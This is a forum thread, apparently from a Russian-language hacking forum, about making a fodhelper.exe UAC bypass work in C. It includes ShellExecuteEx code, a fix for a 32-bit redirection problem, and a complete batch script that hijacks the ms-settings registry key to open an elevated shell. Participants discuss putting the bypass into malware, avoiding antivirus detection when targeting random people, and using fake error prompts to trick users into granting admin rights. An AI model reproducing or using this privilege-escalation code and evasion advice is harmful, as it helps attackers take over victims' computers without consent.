Проблема с UAC Bypass

[n0kkster]

Собственно всем привет, уважаемые! Реализую самый заезженный способ байпасса юак через fodhelper.exe на сишечке, но проблема заключается в том, что как бы я не пытался запустить fodhelper из под x32, софтина не видит его, хоть убей. Пробовал через CreateProcess, ShellExecuteEx, даже через гребанный system(*путь до fodhelper*), ничего не помогло. В х64 все прекрасно работает. Не понимаю в какую сторону копать, чтобы понять почему такая проблема возникает именно на x32. Если запущу таким же образом условный calc.exe, то все отработает на ура.

 SHELLEXECUTEINFOW shellinfo;
        shellinfo.lpVerb = L"open";
        shellinfo.lpFile = L"C:\\Windows\\System32\\fodhelper.exe";
        shellinfo.nShow = 0;
        shellinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
        shellinfo.cbSize = sizeof(SHELLEXECUTEINFOW);
        shellinfo.hwnd = 0;
        shellinfo.lpParameters = 0;
        shellinfo.lpDirectory = 0;
        shellinfo.hInstApp = 0;
        if (API(SHELL32, ShellExecuteExW)(&shellinfo))
        {
            wprintf(L"Created process sucessfully through shellexecute\n");
            API(KERNEL32, ExitProcess)(0);
        }
        else
            Exit(L"error while creating process");

Спойлер: ошибка

 

[parag0n]

Wow64DisableWow64FsRedirection function (wow64apiset.h) - Win32 apps

Disables file system redirection for the calling thread. File system redirection is enabled by default.

docs.microsoft.com

 

[n0kkster]

Проблема решена, спасибо за совет.

 

[qGodless]

I don't recommend implementing this to your malware. It was used in TrickBOT. Which will get your payload detected within hours if not minutes

Instead prompt the user to accept the UAC with Social engineering within the app.
Example: Can't find ....Dll please run as admin

 

[darksoftware]

UAC LPE (мой вариант):

Требования:
- Windows 10 (любой билд, тестировалось на 21H2).
- UAC уровень (контроль учётных записей) ниже высокого. По умолчанию на всех ОС: средний.

Что делает:
Повышает права от ограниченного администратора до полного. Можно проверить с помощью команды:
whoami.exe /priv

Защита:
Антивирусами палится, но например с дефолтовым Windows Defender, payload успевает отработать до момента блокировки.

код батника:

set cmd=cmd.exe /k
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v "DelegateExecute" /d "" /f
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /ve /f /d "%cmd%"
"%SystemRoot%\System32\fodhelper.exe"
TIMEOUT /T 1
reg delete "HKCU\Software\Classes\ms-settings\Shell\Open\command" /f

 

[Th30C0der]

first this exploit is very old and detected , second if your application.exe is x86 and the system is x64 then you will face a problem and can't exploit .
what u need to do is use x64 for x64 and x86 for x86 you can exploit this by manpulating registery then u can use cmd to execute the fodhelper and exit your main.exe the fodhelper will lunch your application.exe as administrator .

 

[darksoftware]

yes, but this exploit manages to work, then it is blocked by the defender

 

[n0kkster]

first this exploit is very old and detected , second if your application.exe is x86 and the system is x64 then you will face a problem and can't exploit .
what u need to do is use x64 for x64 and x86 for x86 you can exploit this by manpulating registery then u can use cmd to execute the fodhelper and exit your main.exe the fodhelper will lunch your application.exe as administrator .

no detects at runtime and scantime at least from windef btw, you CAN use this trick if your x86 application running under x64 system

 

[Th30C0der]

no detects at runtime and scantime at least from windef btw, you CAN use this trick if your x86 application running under x64 system

when you are targeting random people u can't assume what AV do use so if WD not Detect KasperSky will then will share the signature with other AV companies and will be detected by All , the reason iam saying this because there a new windows 10 LPE Exploits and not detected at least

and about the trick x86 application its not a trick if you run x86 application under x64 system and you run cmd or fodhelper he will search in syswow64 not in system path that will not work i have tested this in the past like in 2020 or 2019 cant remmber

 

[n0kkster]

when you are targeting random people u can't assume what AV do use so if WD not Detect KasperSky will then will share the signature with other AV companies and will be detected by All , the reason iam saying this because there a new windows 10 LPE Exploits and not detected at least

and about the trick x86 application its not a trick if you run x86 application under x64 system and you run cmd or fodhelper he will search in syswow64 not in system path that will not work i have tested this in the past like in 2020 or 2019 cant remmber

i know about redirection, but there is great winapi command Wow64DisableWow64FsRedirection that tolds your app to find the fodhelper in right folder. about detections, probably its detected by another AVs, anyway, im not using this in ready-to-use malware, this sample is for my personal using

 

[Th30C0der]

i know about redirection, but there is great winapi command Wow64DisableWow64FsRedirection that tolds your app to find the fodhelper in right folder. about detections, probably its detected by another AVs, anyway, im not using this in ready-to-use malware, this sample is for my personal using

Thank you for explain i learn new thing